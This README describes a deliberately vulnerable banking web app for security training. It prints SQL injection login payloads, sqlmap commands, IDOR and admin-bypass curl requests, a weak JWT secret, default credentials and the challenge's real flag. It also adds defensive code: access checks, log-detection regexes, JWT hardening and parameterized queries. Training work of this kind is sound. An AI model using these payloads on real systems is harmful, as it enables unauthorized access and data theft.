## Overview

Razz Bank is a comprehensive training platform that demonstrates multiple categories of web application vulnerabilities in a realistic banking environment. This enhanced version includes modern UI/UX design, JWT authentication, IDOR vulnerabilities, and a comprehensive API ecosystem.
## Security Vulnerabilities Included

- SQL Injection (SQLi) - Vulnerable login forms and database queries
- Insecure Direct Object Reference (IDOR) - Unauthorized access to user profiles and account data
- JWT Authentication Bypass - Weak JWT implementation with predictable secrets
- Authorization Bypass - Admin panel access through URL parameters
- Information Disclosure - Exposed user data and system information
## Flag Information

- Real Flag: Located in the `system_flags` table: `RAZZ{y0U_H@v3_f()UNd_$QL_!NJ3CT10N}`
- Decoy Flags: 5+ fake flags scattered throughout the application
- Flag Format: All flags follow the pattern `RAZZ{...}`
## Quick Setup & Deployment

Docker:

```bash
# Clone the repository
git clone https://github.com/KerberoSec/RAZZ_BANK.git
cd RAZZ_BANK

# Development environment (SQLite)
docker-compose --profile development up -d

# Production environment (PostgreSQL + Monitoring)
docker-compose --profile production up -d

# Access the application
open http://localhost:5000
```

Manual (local Python):

```bash
# Install dependencies
pip install -r requirements.txt

# Initialize database
python3 app.py

# Access the application
open http://localhost:5000
```

Ubuntu (setup scripts):

```bash
# Install system dependencies
sudo apt update
sudo apt install python3-pip docker.io docker-compose -y

# Clone and run
git clone https://github.com/KerberoSec/RAZZ_BANK.git
cd RAZZ_BANK
chmod +x setup.sh run.sh
./run.sh
```

## Enhanced Project Structure
```text
RAZZ_BANK/
├── app.py                    # Main Flask application with JWT & IDOR
├── requirements.txt          # Python dependencies (enhanced)
├── docker-compose.yml        # Multi-service Docker setup
├── DOCKER_SETUP.md           # Docker deployment guide
├── README.md                 # This documentation
│
├── templates/                # Enhanced HTML templates
│   ├── base.html             # Modern responsive base template
│   ├── index.html            # Landing page
│   ├── login.html            # JWT-enabled login page
│   ├── register.html         # Registration page
│   ├── dashboard.html        # Enhanced dashboard with vulnerabilities
│   ├── statements.html       # Transaction statements
│   └── account_settings.html # User account management
│
├── static/                   # Frontend assets
│   ├── css/
│   │   └── style.css         # Modern CSS with themes & animations
│   ├── js/
│   │   └── main.js           # Enhanced JavaScript with API integration
│   ├── sw.js                 # Service Worker for PWA
│   └── manifest.json         # PWA manifest
│
├── monitoring/               # Monitoring configuration
│   ├── prometheus.yml        # Metrics collection
│   └── grafana/              # Dashboard configurations
│
├── nginx/                    # Reverse proxy configuration
├── haproxy/                  # Load balancer configuration
└── fluentd/                  # Log aggregation
```
## Vulnerability Categories & Exploitation

### SQL Injection

- Location: Login form (`/login`)
- Type: Union-based SQL injection
- Impact: Authentication bypass, data exfiltration

```text
-- Authentication bypass
Username: admin' OR '1'='1' --
Password: anything

-- Data extraction (flag retrieval)
Username: admin' UNION SELECT 1,2,3,flag_value,5,6,7,8 FROM system_flags--
Password: anything
```

```bash
# Basic enumeration
sqlmap -u "http://localhost:5000/login" --data="username=admin&password=admin" --dbs

# Extract flag from system_flags table
sqlmap -u "http://localhost:5000/login" --data="username=admin&password=admin" -D main -T system_flags --dump
```

### Insecure Direct Object Reference (IDOR)

Endpoints:
- `/profile/<user_id>` - View any user's profile data
- `/account/<account_number>/transactions` - Access any account's transactions

```bash
# Access admin profile
curl http://localhost:5000/profile/1057

# Access any account's transactions
curl http://localhost:5000/account/ADM001/transactions
```

### JWT Authentication Bypass

Issues:
- Weak secret key: `weak_secret_key_2024`
- No key rotation
- Client-side storage in localStorage
```bash
# Login with JWT
curl -X POST http://localhost:5000/api/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": "admin123!@#"}'

# Decode the JWT header (weak secret allows offline cracking of the signature);
# the token's three segments are dot-separated, so decode the first one
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." | cut -d. -f1 | base64 -d
```

### Authorization Bypass

- Location: Admin panel (`/admin/users`)
- Method: URL parameter manipulation
```bash
# Bypass admin authorization
curl "http://localhost:5000/admin/users?admin=true"
```

## API Documentation
### Authentication endpoints

| Method | Endpoint | Description |
|---|---|---|
| POST | `/api/auth/login` | JWT-based authentication |
| POST | `/api/auth/verify` | JWT token verification |
### Banking API endpoints

| Method | Endpoint | Description | Authentication |
|---|---|---|---|
| GET | `/api/status` | API status and feature list | None |
| GET | `/api/transactions` | User transaction history | Session/JWT |
| POST | `/api/transfer` | Money transfer between accounts | Session/JWT |
| POST | `/api/pay-bill` | Bill payment processing | Session/JWT |
| POST | `/api/apply-loan` | Loan application submission | Session/JWT |
| GET | `/api/v1.0/account` | Account details retrieval (IDOR vulnerable) | None |
### Vulnerable endpoints

| Method | Endpoint | Vulnerability | Impact |
|---|---|---|---|
| GET | `/profile/<user_id>` | IDOR | Profile data exposure |
| GET | `/account/<account>/transactions` | IDOR | Transaction data exposure |
| GET | `/api/v1.0/account` | IDOR | Account data exposure with flag |
| GET | `/admin/users?admin=true` | AuthZ Bypass | Admin data access |
| POST | `/login` | SQL Injection | Authentication bypass |
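
Every IDOR and AuthZ Bypass row in this table comes from the same omission: the handler takes the object id or the `admin` flag from the request and never compares it with the server-side session. As an added example (not code from the RAZZ_BANK project), the following handlers show the check that closes those rows. `Session`, the ownership maps and every id other than `1057`/`ADM001` are constructed placeholders, and responses are `(status, body)` tuples rather than Flask responses.

```python
from dataclasses import dataclass

# Constructed ownership data standing in for the database. 1057 and ADM001 appear
# in the README; the other ids and account numbers are made up for this demo.
PROFILE_OWNER = {1057: 1057, 2001: 2001, 2002: 2002}   # profile id -> owning user id
ACCOUNT_OWNER = {"ADM001": 1057, "ACC2001": 2001}       # account number -> owning user id


@dataclass(frozen=True)
class Session:
    """Identity established at login and kept server-side (session store).
    The role is never read from the request, so ?admin=true cannot change it."""
    user_id: int
    role: str


def _may_access(session: Session, owner_id: int) -> bool:
    # Owner of the object, or an administrator; nothing else.
    return session.role == "admin" or session.user_id == owner_id


def view_profile(session: Session, user_id: int):
    """GET /profile/<user_id> with the ownership check the lab omits."""
    owner = PROFILE_OWNER.get(user_id)
    # Same 404 for "does not exist" and "not yours": a 403 would confirm the id exists.
    if owner is None or not _may_access(session, owner):
        return 404, {"error": "not found"}
    return 200, {"user_id": user_id, "owner": owner}


def view_account_transactions(session: Session, account_number: str):
    """GET /account/<account_number>/transactions with the same check."""
    owner = ACCOUNT_OWNER.get(account_number)
    if owner is None or not _may_access(session, owner):
        return 404, {"error": "not found"}
    return 200, {"account": account_number, "transactions": []}   # rows omitted in the demo


def view_admin_users(session: Session, query_params: dict):
    """GET /admin/users: the decision uses the session role only.
    query_params is accepted to make explicit that it plays no part in it."""
    if session.role != "admin":
        return 403, {"error": "forbidden"}
    return 200, {"users": sorted(PROFILE_OWNER)}


if __name__ == "__main__":
    alice = Session(user_id=2001, role="user")
    print(view_profile(alice, 2001))                     # own profile: 200
    print(view_profile(alice, 1057))                     # someone else's: 404
    print(view_admin_users(alice, {"admin": "true"}))    # parameter ignored: 403
```

Two details matter beyond the check itself: the role comes from `Session`, which is populated at login, so the `admin` query parameter has nothing to influence; and a foreign object receives the same 404 as a missing one, so the endpoint does not reveal which ids exist (the Information Disclosure item listed above).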
## Architecture & Technologies

- Framework: Flask 3.1.2 with enhanced security (intentionally vulnerable)
- Database: SQLite (development) / PostgreSQL (production)
- Authentication: Session-based + JWT (dual authentication)
- Caching: Redis for session management
- Security: Intentionally vulnerable implementation
- UI Framework: Modern CSS with CSS Variables and Grid/Flexbox
- JavaScript: Vanilla JS with modern ES6+ features
- PWA: Service Worker + Web App Manifest
- Responsive Design: Mobile-first approach
- Accessibility: WCAG 2.1 compliant structure
- Containerization: Docker + Docker Compose
- Reverse Proxy: Nginx with SSL termination
- Load Balancing: HAProxy for high availability
- Monitoring: Prometheus + Grafana
- Logging: Fluentd for log aggregation
## Enhanced Features

- Dark/Light Theme: Toggle-able theme system
- Progressive Web App: Installable on mobile devices
- Responsive Design: Optimized for all screen sizes
- Accessibility: Screen reader compatible
- Animations: Smooth transitions and micro-interactions
- Vulnerability Demonstration Panel: Interactive vulnerability testing
- API Testing Interface: Built-in API exploration tool
- Real-time Vulnerability Detection: Client-side security warnings
- Educational Context: Contextual security information
- JWT Authentication: Weak implementation for educational purposes
- Session Management: Redis-backed session storage
- Real-time Updates: WebSocket-ready architecture
- Monitoring: Comprehensive application monitoring
## Docker Deployment Guide

Development profile:

```bash
# Single container setup with SQLite
docker-compose --profile development up -d

# Access points:
# - Application: http://localhost:5001
# - Hot reload enabled for development
```

Production profile:

```bash
# Full stack with PostgreSQL, Redis, monitoring
docker-compose --profile production up -d

# Access points:
# - Application: http://localhost:5000
# - Database Admin: http://localhost:8080
# - Grafana: http://localhost:3000
# - Prometheus: http://localhost:9090
# - HAProxy Stats: http://localhost:8082/stats
```

| Service | Description | Port | Credentials |
|---|---|---|---|
| razz-bank-app | Main application | 5000 | admin/admin123!@# |
| postgres | Database server | 5432 | bank_user/secure_bank_password_2025 |
| redis | Session cache | 6379 | redis_secure_password_2025 |
| nginx | Reverse proxy | 80/443 | - |
| adminer | DB administration | 8080 | - |
| grafana | Monitoring dashboards | 3000 | admin/admin_grafana_2025 |
| prometheus | Metrics collection | 9090 | - |
## Testing & Validation

```bash
# API endpoint testing
curl -s http://localhost:5000/api/status | jq

# Health checks
curl -s http://localhost:5000/health

# Vulnerability validation
curl -s "http://localhost:5000/admin/users?admin=true" | jq
```

Checklist:

- SQL injection in login form
- IDOR vulnerability in profile access
- JWT authentication flow
- Admin authorization bypass
- API endpoint accessibility
- PWA installation
- Responsive design on mobile
- Theme switching functionality
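
The checklist above is exercised from the client side; the Fluentd/Prometheus stack can carry the defender's view of the same activity. As an added example that is not part of the RAZZ_BANK project, the following rules pick the three request-level behaviours the lab exercises out of nginx-style access logs: an `admin` parameter on an admin route, a SQL quote-and-keyword sequence in a URL, and one client walking through many `/profile/<id>` or `/account/<n>` objects. The log lines, IPs, timestamps and the enumeration threshold are constructed for the demo.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines in nginx "combined" format. IPs, ids and
# timestamps are placeholders; 1057 and /admin/users come from the README.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2025:10:00:01 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2025:10:00:02 +0000] "GET /profile/2001 HTTP/1.1" 200 310 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2025:10:00:03 +0000] "GET /profile/1001 HTTP/1.1" 200 305 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2025:10:00:03 +0000] "GET /profile/1002 HTTP/1.1" 200 305 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2025:10:00:04 +0000] "GET /profile/1003 HTTP/1.1" 200 305 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2025:10:00:05 +0000] "GET /admin/users?admin=true HTTP/1.1" 200 900 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2025:10:00:06 +0000] "GET /profile/1057%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# A quote followed by a boolean/union/comment token: the shape of the README's login payloads.
SQLI_RE = re.compile(r"'\s*(or|and|union|--)", re.IGNORECASE)
# The object-addressing routes the README lists as IDOR-vulnerable.
OBJECT_RE = re.compile(r"^/(profile|account)/[^/?]+")


def parse_line(line: str):
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = unquote(url.path)
    rec["query"] = parse_qs(url.query)
    return rec


def detect(lines, enum_threshold: int = 3):
    """Return (rule, client_ip, detail) alerts. enum_threshold is a tuning assumption:
    how many distinct objects one client may touch before it looks like enumeration."""
    alerts = []
    objects_by_ip = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if SQLI_RE.search(unquote(rec["target"])):
            alerts.append(("sqli_probe", rec["ip"], rec["path"]))
        if rec["path"].startswith("/admin/") and "admin" in rec["query"]:
            alerts.append(("authz_param_tamper", rec["ip"], rec["path"]))
        obj = OBJECT_RE.match(rec["path"])
        if obj:
            objects_by_ip[rec["ip"]].add(obj.group(0))
    for ip, objs in objects_by_ip.items():
        if len(objs) >= enum_threshold:
            alerts.append(("idor_enumeration", ip, f"{len(objs)} distinct objects"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

The login-form injection itself travels in a POST body, which an access log does not record, so the SQL rule only sees probes carried in the URL; catching the `/login` payload needs the application (or a proxy in front of it) to log the submitted username.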
## Educational Learning Paths

- Reconnaissance - Explore `/robots.txt`, `/sitemap.xml`
- SQL Injection - Basic authentication bypass
- Flag Hunting - Distinguish real vs. fake flags
- Documentation Review - Understand application structure
- Advanced SQLi - Union-based data extraction
- IDOR Exploitation - Unauthorized data access
- API Security - JWT token analysis
- Authorization Testing - Admin panel bypass
- Full Chain Exploitation - Combine multiple vulnerabilities
- Custom Payload Development - Create sophisticated attacks
- Defense Evasion - Bypass security controls
- Report Writing - Document findings professionally
## Configuration & Customization

```bash
# Database configuration
DATABASE_URL=sqlite:///razz_bank.db  # or postgresql://...
REDIS_URL=redis://localhost:6379

# Application settings
FLASK_ENV=production
FLASK_DEBUG=false

# JWT configuration
JWT_SECRET=weak_secret_key_2024  # Intentionally weak
JWT_ALGORITHM=HS256
```

- Database Backend: Switch between SQLite and PostgreSQL
- Authentication Method: Session-based vs JWT
- Theme System: Customize colors and styling
- Vulnerability Levels: Enable/disable specific vulnerabilities
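
`JWT_SECRET` and `JWT_ALGORITHM` above are the two settings behind the weak-JWT finding. As an added example that is not part of the RAZZ_BANK code base, the following standard-library HS256 signer and verifier shows what the hardened side looks like in code: a minimum secret length enforced when a key is loaded, verification pinned to one algorithm, and key rotation through the `kid` header. The `KeyRing` class, the `2025-01`/`2025-02` key ids and the claim values are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

# RFC 7518 section 3.2 expects an HS256 key of at least 256 bits (32 bytes).
# The lab's JWT_SECRET=weak_secret_key_2024 is 20 bytes of guessable text.
MIN_SECRET_BYTES = 32


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


class KeyRing:
    """HS256 secrets indexed by 'kid'. New tokens are signed with the current
    key; older keys keep verifying until retired, which is the rotation window."""

    def __init__(self):
        self.keys = {}
        self.current = None

    def add(self, kid: str, secret: bytes):
        if len(secret) < MIN_SECRET_BYTES:   # refuse weak secrets at load time
            raise ValueError(f"secret {kid!r} is {len(secret)} bytes, need >= {MIN_SECRET_BYTES}")
        self.keys[kid] = secret
        self.current = kid

    def retire(self, kid: str):
        if kid == self.current:
            raise ValueError("add a new key before retiring the current one")
        self.keys.pop(kid, None)


def sign(ring: KeyRing, claims: dict, ttl: int = 900, now: float = None) -> str:
    now = time.time() if now is None else now
    header = {"alg": "HS256", "typ": "JWT", "kid": ring.current}
    payload = dict(claims, iat=int(now), exp=int(now) + ttl)
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode()) + "."
                     + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(ring.keys[ring.current], signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify(ring: KeyRing, token: str, now: float = None):
    """Return the claims of a valid token, else None. The algorithm is pinned,
    the key is chosen by kid from the server-side ring, and exp is enforced."""
    now = time.time() if now is None else now
    try:
        h64, p64, s64 = token.split(".")
        header = json.loads(b64url_decode(h64))
        if header.get("alg") != "HS256":            # no 'none', no algorithm swap
            return None
        secret = ring.keys.get(header.get("kid"))
        if secret is None:                          # unknown or already-retired key
            return None
        expected = hmac.new(secret, f"{h64}.{p64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(s64)):
            return None
        claims = json.loads(b64url_decode(p64))
        if not isinstance(claims, dict) or not isinstance(claims.get("exp"), (int, float)):
            return None
        return claims if claims["exp"] > now else None
    except (ValueError, TypeError, AttributeError):  # malformed base64, JSON or structure
        return None


def rotation_demo(now: float = 1_700_000_000.0) -> dict:
    """Weak-secret rejection, a rotation window, and the verifier's negative cases."""
    ring = KeyRing()
    try:
        ring.add("lab", b"weak_secret_key_2024")      # the README's value: refused
        weak_rejected = False
    except ValueError:
        weak_rejected = True
    ring.add("2025-01", secrets.token_bytes(32))
    old_token = sign(ring, {"sub": "admin", "role": "admin"}, now=now)
    ring.add("2025-02", secrets.token_bytes(32))     # rotate: 2025-02 is now current
    new_token = sign(ring, {"sub": "alice", "role": "user"}, now=now)
    h64, _, s64 = old_token.split(".")
    edited = b64url(json.dumps({"sub": "alice", "role": "admin", "exp": int(now) + 900}).encode())
    none_header = b64url(b'{"alg":"none","kid":"2025-02"}')
    results = {
        "weak_rejected": weak_rejected,
        "old_valid_in_window": verify(ring, old_token, now) is not None,
        "edited_payload_rejected": verify(ring, f"{h64}.{edited}.{s64}", now) is None,
        "alg_none_rejected": verify(ring, f"{none_header}.{edited}.", now) is None,
        "expired_rejected": verify(ring, new_token, now + 901) is None,
    }
    ring.retire("2025-01")
    results["old_rejected_after_retire"] = verify(ring, old_token, now) is None
    results["new_valid_after_retire"] = verify(ring, new_token, now) is not None
    return results
```

Rotation works because the verifier selects the key by the token's `kid` from a server-side ring, so tokens issued under the previous key stay valid for the window you choose and stop verifying once that key is retired; the length check in `KeyRing.add` is what would have refused `weak_secret_key_2024` at startup.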
## Security Warnings

- Never deploy in production - This application is intentionally vulnerable
- Educational use only - For authorized security training purposes
- Isolated environment - Deploy only in sandboxed/isolated networks
- Legal compliance - Ensure proper authorization before testing
- Data protection - Do not use real personal or financial data

The application demonstrates the following security anti-patterns:

- Unparameterized queries → Use prepared statements
- Missing authorization checks → Implement proper access controls
- Weak cryptographic practices → Use strong, rotated secrets
- Information disclosure → Minimize error message details
- Insufficient input validation → Implement comprehensive validation
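
The first anti-pattern is the one behind the `/login` flag. As an added example (not code from the RAZZ_BANK project), here is a string-built login query beside its parameterized form, run against a constructed in-memory SQLite table with the README's bypass payload; the table layout and the plaintext password column are simplifications for the demo.

```python
import sqlite3

# Constructed in-memory stand-in for the lab's users table. Plaintext passwords
# are kept only to keep the demo short; real code compares a salted hash.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
INSERT INTO users VALUES (1, 'admin', 'admin123!@#', 'admin');
INSERT INTO users VALUES (2, 'alice', 'alice-pass', 'user');
"""


def new_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Anti-pattern: input is spliced into the SQL text, so quote characters
    and comment markers in the username become part of the query."""
    query = (
        "SELECT id, username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn, username: str, password: str):
    """Fix: placeholders. The SQL text is fixed and the driver binds the values,
    so the same input is only ever compared as a string literal."""
    query = "SELECT id, username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


def run_demo() -> dict:
    """Run the README's bypass payload through both versions of the query."""
    conn = new_db()
    payload = "admin' OR '1'='1' --"   # the authentication-bypass payload from the README
    return {
        "vulnerable_with_payload": login_vulnerable(conn, payload, "anything"),
        "safe_with_payload": login_safe(conn, payload, "anything"),
        "safe_with_real_credentials": login_safe(conn, "admin", "admin123!@#"),
    }


if __name__ == "__main__":
    for name, row in run_demo().items():
        print(f"{name}: {row}")
```

`run_demo()` shows the payload logging in as `admin` through the vulnerable query and returning no row through the parameterized one; the same binding also removes the UNION extraction path, because the username is never interpreted as SQL.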
## Challenge Completion

Primary Objective: Extract the real flag from the `system_flags` table

Secondary Objectives:

- Demonstrate IDOR vulnerability
- Exploit JWT authentication
- Bypass admin authorization
- Document all findings

- Real Flag: `RAZZ{y0U_H@v3_f()UNd_$QL_!NJ3CT10N}`
- Location: `system_flags` table, `flag_value` column
- Method: SQL injection via login form
## Support & Resources

- Port conflicts: Use `docker-compose down` and check port availability
- Database issues: Reset with `rm razz_bank.db` and restart
- Permission errors: Check file permissions with `chmod +x setup.sh run.sh`
- Report Issues: GitHub Issues for bug reports
- Contributions: Pull requests for improvements
- Discussions: GitHub Discussions for questions
## License & Legal

This project is released under the MIT License for educational purposes.

Legal Notice: This software is designed for educational and authorized security testing purposes only. Users are responsible for ensuring compliance with applicable laws and regulations. The authors assume no liability for misuse of this software.

Created for Security Education by Razz Security. Use responsibly - Learn ethically - Secure the digital world.